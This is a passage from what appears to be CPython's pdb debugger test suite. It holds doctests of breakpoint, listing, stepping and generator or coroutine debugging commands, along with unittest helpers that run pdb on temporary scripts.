1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
3 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) clear 3
Deleted breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) condition 1
Breakpoint 1 is now unconditional.
(Pdb) enable 1
Enabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) clear 1
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) commands 2
(com) p "42"
(com) print("42", 7*6)
(com) end
(Pdb) continue
1
'42'
42 42
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(4)test_function()
-> print(2)
(Pdb) clear
Clear all breaks? y
Deleted breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) tbreak 5
Breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
(Pdb) continue
2
Deleted breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(5)test_function()
-> print(3)
(Pdb) break
(Pdb) continue
3
4
"""
def test_pdb_breakpoints_preserved_across_interactive_sessions():
"""Breakpoints are remembered between interactive sessions
>>> reset_Breakpoint()
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'import test.test_pdb',
... 'break test.test_pdb.do_something',
... 'break test.test_pdb.do_nothing',
... 'break',
... 'continue',
... ]):
... pdb.run('print()')
> <string>(1)<module>()...
(Pdb) import test.test_pdb
(Pdb) break test.test_pdb.do_something
Breakpoint 1 at ...test_pdb.py:...
(Pdb) break test.test_pdb.do_nothing
Breakpoint 2 at ...test_pdb.py:...
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep yes at ...test_pdb.py:...
2 breakpoint keep yes at ...test_pdb.py:...
(Pdb) continue
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'break',
... 'break pdb.find_function',
... 'break',
... 'clear 1',
... 'continue',
... ]):
... pdb.run('print()')
> <string>(1)<module>()...
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep yes at ...test_pdb.py:...
2 breakpoint keep yes at ...test_pdb.py:...
(Pdb) break pdb.find_function
Breakpoint 3 at ...pdb.py:97
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep yes at ...test_pdb.py:...
2 breakpoint keep yes at ...test_pdb.py:...
3 breakpoint keep yes at ...pdb.py:...
(Pdb) clear 1
Deleted breakpoint 1 at ...test_pdb.py:...
(Pdb) continue
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'break',
... 'clear 2',
... 'clear 3',
... 'continue',
... ]):
... pdb.run('print()')
> <string>(1)<module>()...
(Pdb) break
Num Type Disp Enb Where
2 breakpoint keep yes at ...test_pdb.py:...
3 breakpoint keep yes at ...pdb.py:...
(Pdb) clear 2
Deleted breakpoint 2 at ...test_pdb.py:...
(Pdb) clear 3
Deleted breakpoint 3 at ...pdb.py:...
(Pdb) continue
"""
def test_pdb_pp_repr_exc():
"""Test that do_p/do_pp do not swallow exceptions.
>>> class BadRepr:
... def __repr__(self):
... raise Exception('repr_exc')
>>> obj = BadRepr()
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'p obj',
... 'pp obj',
... 'continue',
... ]):
... test_function()
--Return--
> <doctest test.test_pdb.test_pdb_pp_repr_exc[2]>(2)test_function()->None
-> import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
(Pdb) p obj
*** Exception: repr_exc
(Pdb) pp obj
*** Exception: repr_exc
(Pdb) continue
"""
def do_nothing():
pass
def do_something():
print(42)
def test_list_commands():
"""Test the list and source commands of pdb.
>>> def test_function_2(foo):
... import test.test_pdb
... test.test_pdb.do_nothing()
... 'some...'
... 'more...'
... 'code...'
... 'to...'
... 'make...'
... 'a...'
... 'long...'
... 'listing...'
... 'useful...'
... '...'
... '...'
... return foo
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'list', # list first function
... 'step', # step into second function
... 'list', # list second function
... 'list', # continue listing to EOF
... 'list 1,3', # list specific lines
... 'list x', # invalid argument
... 'next', # step to import
... 'next', # step over import
... 'step', # step into do_nothing
... 'longlist', # list all lines
... 'source do_something', # list all lines of function
...     'source fooxxx',       # something that doesn't exist
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_list_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> ret = test_function_2('baz')
[EOF]
(Pdb) step
--Call--
> <doctest test.test_pdb.test_list_commands[0]>(1)test_function_2()
-> def test_function_2(foo):
(Pdb) list
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
4 'some...'
5 'more...'
6 'code...'
7 'to...'
8 'make...'
9 'a...'
10 'long...'
11 'listing...'
(Pdb) list
12 'useful...'
13 '...'
14 '...'
15 return foo
[EOF]
(Pdb) list 1,3
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
(Pdb) list x
*** ...
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(2)test_function_2()
-> import test.test_pdb
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(3)test_function_2()
-> test.test_pdb.do_nothing()
(Pdb) step
--Call--
> ...test_pdb.py(...)do_nothing()
-> def do_nothing():
(Pdb) longlist
... -> def do_nothing():
... pass
(Pdb) source do_something
... def do_something():
... print(42)
(Pdb) source fooxxx
*** ...
(Pdb) continue
"""
def test_pdb_whatis_command():
"""Test the whatis command
>>> myvar = (1,2)
>>> def myfunc():
... pass
>>> class MyClass:
... def mymethod(self):
... pass
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'whatis myvar',
... 'whatis myfunc',
... 'whatis MyClass',
... 'whatis MyClass()',
... 'whatis MyClass.mymethod',
... 'whatis MyClass().mymethod',
... 'continue',
... ]):
... test_function()
--Return--
> <doctest test.test_pdb.test_pdb_whatis_command[3]>(2)test_function()->None
-> import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
(Pdb) whatis myvar
<class 'tuple'>
(Pdb) whatis myfunc
Function myfunc
(Pdb) whatis MyClass
Class test.test_pdb.MyClass
(Pdb) whatis MyClass()
<class 'test.test_pdb.MyClass'>
(Pdb) whatis MyClass.mymethod
Function mymethod
(Pdb) whatis MyClass().mymethod
Method mymethod
(Pdb) continue
"""
def test_post_mortem():
"""Test post mortem traceback debugging.
>>> def test_function_2():
... try:
... 1/0
... finally:
... print('Exception!')
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... print('Not reached.')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'next', # step over exception-raising call
... 'bt', # get a backtrace
... 'list', # list code of test_function()
... 'down', # step into test_function_2()
... 'list', # list code of test_function_2()
... 'continue',
... ]):
... try:
... test_function()
... except ZeroDivisionError:
... print('Correctly reraised.')
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) next
Exception!
ZeroDivisionError: division by zero
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) bt
...
<doctest test.test_pdb.test_post_mortem[2]>(10)<module>()
-> test_function()
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
<doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> test_function_2()
4 print('Not reached.')
[EOF]
(Pdb) down
> <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function_2():
2 try:
3 >> 1/0
4 finally:
5 -> print('Exception!')
[EOF]
(Pdb) continue
Correctly reraised.
"""
def test_pdb_skip_modules():
"""This illustrates the simple case of module skipping.
>>> def skip_module():
... import string
... import pdb; pdb.Pdb(skip=['stri*'], nosigint=True, readrc=False).set_trace()
... string.capwords('FOO')
>>> with PdbTestInput([
... 'step',
... 'continue',
... ]):
... skip_module()
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()
-> string.capwords('FOO')
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()->None
-> string.capwords('FOO')
(Pdb) continue
"""
# Module for testing skipping of module that makes a callback
mod = types.ModuleType('module_to_skip')
exec('def foo_pony(callback): x = 1; callback(); return None', mod.__dict__)
def test_pdb_skip_modules_with_callback():
"""This illustrates skipping of modules that call into other code.
>>> def skip_module():
... def callback():
... return None
... import pdb; pdb.Pdb(skip=['module_to_skip*'], nosigint=True, readrc=False).set_trace()
... mod.foo_pony(callback)
>>> with PdbTestInput([
... 'step',
... 'step',
... 'step',
... 'step',
... 'step',
... 'continue',
... ]):
... skip_module()
... pass # provides something to "step" to
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()
-> mod.foo_pony(callback)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(2)callback()
-> def callback():
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()->None
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()->None
-> mod.foo_pony(callback)
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[1]>(10)<module>()
-> pass # provides something to "step" to
(Pdb) continue
"""
def test_pdb_continue_in_bottomframe():
"""Test that "continue" and "next" work properly in bottom frame (issue #5294).
>>> def test_function():
... import pdb, sys; inst = pdb.Pdb(nosigint=True, readrc=False)
... inst.set_trace()
... inst.botframe = sys._getframe() # hackery to get the right botframe
... print(1)
... print(2)
... print(3)
... print(4)
>>> with PdbTestInput([ # doctest: +ELLIPSIS
... 'next',
... 'break 7',
... 'continue',
... 'next',
... 'continue',
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(4)test_function()
-> inst.botframe = sys._getframe() # hackery to get the right botframe
(Pdb) next
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(5)test_function()
-> print(1)
(Pdb) break 7
Breakpoint ... at <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>:7
(Pdb) continue
1
2
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(7)test_function()
-> print(3)
(Pdb) next
3
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(8)test_function()
-> print(4)
(Pdb) continue
4
"""
def pdb_invoke(method, arg):
"""Run pdb.method(arg)."""
getattr(pdb.Pdb(nosigint=True, readrc=False), method)(arg)
def test_pdb_run_with_incorrect_argument():
"""Testing run and runeval with incorrect first argument.
>>> pti = PdbTestInput(['continue',])
>>> with pti:
... pdb_invoke('run', lambda x: x)
Traceback (most recent call last):
TypeError: exec() arg 1 must be a string, bytes or code object
>>> with pti:
... pdb_invoke('runeval', lambda x: x)
Traceback (most recent call last):
TypeError: eval() arg 1 must be a string, bytes or code object
"""
def test_pdb_run_with_code_object():
"""Testing run and runeval with code object as a first argument.
>>> with PdbTestInput(['step','x', 'continue']): # doctest: +ELLIPSIS
... pdb_invoke('run', compile('x=1', '<string>', 'exec'))
> <string>(1)<module>()...
(Pdb) step
--Return--
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
>>> with PdbTestInput(['x', 'continue']):
... x=0
... pdb_invoke('runeval', compile('x+1', '<string>', 'eval'))
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
"""
def test_next_until_return_at_return_event():
"""Test that pdb stops after a next/until/return issued at a return debug event.
>>> def test_function_2():
... x = 1
... x = 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... test_function_2()
... test_function_2()
... end = 1
>>> reset_Breakpoint()
>>> with PdbTestInput(['break test_function_2',
... 'continue',
... 'return',
... 'next',
... 'continue',
... 'return',
... 'until',
... 'continue',
... 'return',
... 'return',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(3)test_function()
-> test_function_2()
(Pdb) break test_function_2
Breakpoint 1 at <doctest test.test_pdb.test_next_until_return_at_return_event[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) next
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(4)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) until
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(5)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) return
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(6)test_function()
-> end = 1
(Pdb) continue
"""
def test_pdb_next_command_for_generator():
"""Testing skip unwindng stack on yield for generators for "next" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(2)test_gen()
-> yield 0
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()
-> return 1
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()->1
-> return 1
(Pdb) step
StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) continue
finished
"""
def test_pdb_next_command_for_coroutine():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(4)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
Internal StopIteration
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()->None
-> await test_coro()
(Pdb) continue
finished
"""
def test_pdb_next_command_for_asyncgen():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def agen():
... yield 1
... await asyncio.sleep(0)
... yield 2
>>> async def test_coro():
... async for x in agen():
... print(x)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[3]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(3)test_coro()
-> print(x)
(Pdb) next
1
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(2)agen()
-> yield 1
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(3)agen()
-> await asyncio.sleep(0)
(Pdb) continue
2
finished
"""
def test_pdb_return_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "return" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'return',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) return
StopIteration: 1
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(8)test_function()
-> except StopIteration as ex:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(9)test_function()
-> if ex.value != 1:
(Pdb) continue
finished
"""
def test_pdb_return_command_for_coroutine():
"""Testing no unwindng stack on yield for coroutines for "return" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) continue
finished
"""
def test_pdb_until_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "until" command if target breakpoint is not reached
>>> def test_gen():
... yield 0
... yield 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print(i)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 4',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) until 4
0
1
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()
-> yield 2
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()->2
-> yield 2
(Pdb) step
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(4)test_function()
-> print(i)
(Pdb) continue
2
finished
"""
def test_pdb_until_command_for_coroutine():
"""Testing no unwindng stack for coroutines
for "until" command if target breakpoint is not reached
>>> import asyncio
>>> async def test_coro():
... print(0)
... await asyncio.sleep(0)
... print(1)
... await asyncio.sleep(0)
... print(2)
... await asyncio.sleep(0)
... print(3)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 8',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) until 8
0
1
2
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(8)test_coro()
-> print(3)
(Pdb) continue
3
finished
"""
def test_pdb_next_command_in_generator_for_loop():
"""The next command on returning from a generator controlled by a for loop.
>>> def test_gen():
... yield 0
... return 1
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> reset_Breakpoint()
>>> with PdbTestInput(['break test_gen',
... 'continue',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) break test_gen
Breakpoint 1 at <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(2)test_gen()
-> yield 0
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(3)test_gen()
-> return 1
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_next_command_subiterator():
"""The next command in a generator with a subiterator.
>>> def test_subgenerator():
... yield 0
... return 1
>>> def test_gen():
... x = yield from test_subgenerator()
... return x
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(1)test_gen()
-> def test_gen():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(2)test_gen()
-> x = yield from test_subgenerator()
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(3)test_gen()
-> return x
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_issue_20766():
"""Test for reference leaks when the SIGINT handler is set.
>>> def test_function():
... i = 1
... while i <= 2:
... sess = pdb.Pdb()
... sess.set_trace(sys._getframe())
... print('pdb %d: %s' % (i, sess._previous_sigint_handler))
... i += 1
>>> reset_Breakpoint()
>>> with PdbTestInput(['continue',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
-> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
(Pdb) continue
pdb 1: <built-in function default_int_handler>
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
-> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
(Pdb) continue
pdb 2: <built-in function default_int_handler>
"""
def test_pdb_issue_43318():
"""echo breakpoints cleared with filename:lineno
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
>>> reset_Breakpoint()
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'clear <doctest test.test_pdb.test_pdb_issue_43318[0]>:3',
... 'continue'
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_43318[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
(Pdb) clear <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
(Pdb) continue
1
2
3
4
"""
class PdbTestCase(unittest.TestCase):
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def _run_pdb(self, pdb_args, commands):
self.addCleanup(os_helper.rmtree, '__pycache__')
cmd = [sys.executable, '-m', 'pdb'] + pdb_args
with subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
env = {**os.environ, 'PYTHONIOENCODING': 'utf-8'}
) as proc:
stdout, stderr = proc.communicate(str.encode(commands))
stdout = stdout and bytes.decode(stdout)
stderr = stderr and bytes.decode(stderr)
return stdout, stderr
def run_pdb_script(self, script, commands):
"""Run 'script' lines with pdb and the pdb 'commands'."""
filename = 'main.py'
with open(filename, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(os_helper.unlink, filename)
return self._run_pdb([filename], commands)
def run_pdb_module(self, script, commands):
"""Runs the script code as part of a module"""
self.module_name = 't_main'
os_helper.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
pass
with open(main_file, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(os_helper.rmtree, self.module_name)
return self._run_pdb(['-m', self.module_name], commands)
def _assert_find_function(self, file_content, func_name, expected):
with open(os_helper.TESTFN, 'wb') as f:
f.write(file_content)
expected = None if not expected else (
expected[0], os_helper.TESTFN, expected[1])
self.assertEqual(
expected, pdb.find_function(func_name, os_helper.TESTFN))
def test_find_function_empty_file(self):
self._assert_find_function(b'', 'foo', None)
def test_find_function_found(self):
self._assert_find_function(
"""\
def foo():
pass
def bœr():
pass
def quux():
pass
""".encode(),
'bœr',
('bœr', 4),
)
def test_find_function_found_with_encoding_cookie(self):
self._assert_find_function(
"""\
# coding: iso-8859-15
def foo():
pass
def bœr():
pass
def quux():
pass
""".encode('iso-8859-15'),
'bœr',
('bœr', 5),
)
def test_find_function_found_with_bom(self):
self._assert_find_function(
codecs.BOM_UTF8 + """\
def bœr():
pass
""".encode(),
'bœr',
('bœr', 1),
)
def test_issue7964(self):
# open the file as binary so we can force \r\n newline
with open(os_helper.TESTFN, 'wb') as f:
f.write(b'print("testing my pdb")\r\n')
cmd = [sys.executable, '-m', 'pdb', os_helper.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'quit\n')
self.assertNotIn(b'SyntaxError', stdout,
"Got a syntax error running test script under PDB")
